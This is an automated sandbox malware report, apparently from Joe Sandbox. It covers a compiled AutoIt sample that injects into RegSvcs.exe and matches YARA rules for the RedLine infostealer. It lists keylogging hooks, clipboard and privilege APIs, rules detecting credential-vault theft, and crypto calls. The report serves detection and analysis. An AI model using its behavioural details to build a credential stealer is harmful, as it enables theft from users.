Source: RegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: RegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, R1W.cs

.Net Code: g4oc3ou

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B1425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B1425A

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B14458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B14458

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

0_2_00B1425A

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B00219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B00219

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B2CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00B2CDAC

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.GkYUK8VCrO.exe.3530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.GkYUK8VCrO.exe.36c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000003.00000002.4149885312.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00AA3B4C
Source: GkYUK8VCrO.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: GkYUK8VCrO.exe, 00000000.00000000.1673519036.0000000000B55000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_eaf4511f-2
Source: GkYUK8VCrO.exe, 00000000.00000000.1673519036.0000000000B55000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bcb365d6-d
Source: GkYUK8VCrO.exe, 00000002.00000000.1681468625.0000000000B55000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d90cebcc-1
Source: GkYUK8VCrO.exe, 00000002.00000000.1681468625.0000000000B55000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3aba6073-d
Source: GkYUK8VCrO.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d62bda95-7
Source: GkYUK8VCrO.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5558b808-7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B040B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00B040B1

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AF8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00AF8858

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B0545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00B0545F

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AAE800	0_2_00AAE800
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACDBB5	0_2_00ACDBB5
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AAE060	0_2_00AAE060
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B2804A	0_2_00B2804A
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AB4140	0_2_00AB4140
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC2405	0_2_00AC2405
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AD6522	0_2_00AD6522
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AD267E	0_2_00AD267E
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B20665	0_2_00B20665
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC283A	0_2_00AC283A
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AB6843	0_2_00AB6843
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AD89DF	0_2_00AD89DF
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AD6A94	0_2_00AD6A94
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B20AE2	0_2_00B20AE2
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AB8A0E	0_2_00AB8A0E
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B08B13	0_2_00B08B13
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AFEB07	0_2_00AFEB07
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACCD61	0_2_00ACCD61
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AD7006	0_2_00AD7006
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AB3190	0_2_00AB3190
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AB710E	0_2_00AB710E
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AA1287	0_2_00AA1287
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC33C7	0_2_00AC33C7
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACF419	0_2_00ACF419
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AB5680	0_2_00AB5680
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC16C4	0_2_00AC16C4
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AB58C0	0_2_00AB58C0
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC78D3	0_2_00AC78D3
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC1BB8	0_2_00AC1BB8
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AD9D05	0_2_00AD9D05
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AAFE40	0_2_00AAFE40
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACBFE6	0_2_00ACBFE6
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC1FD0	0_2_00AC1FD0
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00A43610	0_2_00A43610
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 2_2_01A63610	2_2_01A63610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040DC11	3_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407C3F	3_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418CCC	3_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406CA0	3_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004028B0	3_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041A4BE	3_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418244	3_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401650	3_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F20	3_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004193C4	3_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418788	3_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F89	3_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402B90	3_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004073A0	3_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02F6CEB0	3_2_02F6CEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02F6D780	3_2_02F6D780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02F6CB68	3_2_02F6CB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02F61030	3_2_02F61030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02F61020	3_2_02F61020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_068F5E58	3_2_068F5E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_068F9270	3_2_068F9270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_068FB8C8	3_2_068FB8C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_068FE9D0	3_2_068FE9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_068F0007	3_2_068F0007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_068F0040	3_2_068F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D10040	3_2_06D10040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D1A1B0	3_2_06D1A1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D11138	3_2_06D11138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06E59AE8	3_2_06E59AE8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 43 times
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: String function: 00AA7F41 appears 35 times
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: String function: 00AC8B40 appears 42 times
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: String function: 00AC0D27 appears 70 times

Source: GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003B63000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
Source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003D0D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
Source: GkYUK8VCrO.exe, 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefe669a34-3e15-4019-8593-4c1c330bc15b.exe4 vs GkYUK8VCrO.exe
Source: GkYUK8VCrO.exe, 00000002.00000003.1691263761.0000000003833000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
Source: GkYUK8VCrO.exe, 00000002.00000003.1690857295.00000000039DD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
Source: GkYUK8VCrO.exe, 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefe669a34-3e15-4019-8593-4c1c330bc15b.exe4 vs GkYUK8VCrO.exe

Source: GkYUK8VCrO.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.GkYUK8VCrO.exe.3530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.GkYUK8VCrO.exe.36c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000003.00000002.4149885312.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, KLhJmaON.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, KLhJmaON.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 9HIFdl.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 9HIFdl.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@2/2

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B0A2D5 GetLastError,FormatMessageW,

0_2_00B0A2D5

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AF8713 AdjustTokenPrivileges,CloseHandle,		0_2_00AF8713
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AF8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00AF8CC3

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B0B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B0B59E

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B1F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B1F121

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B186D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00B186D0

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AA4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00AA4FE9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

File created: C:\Users\user\AppData\Local\Temp\aut6482.tmp

Jump to behavior

Source: GkYUK8VCrO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
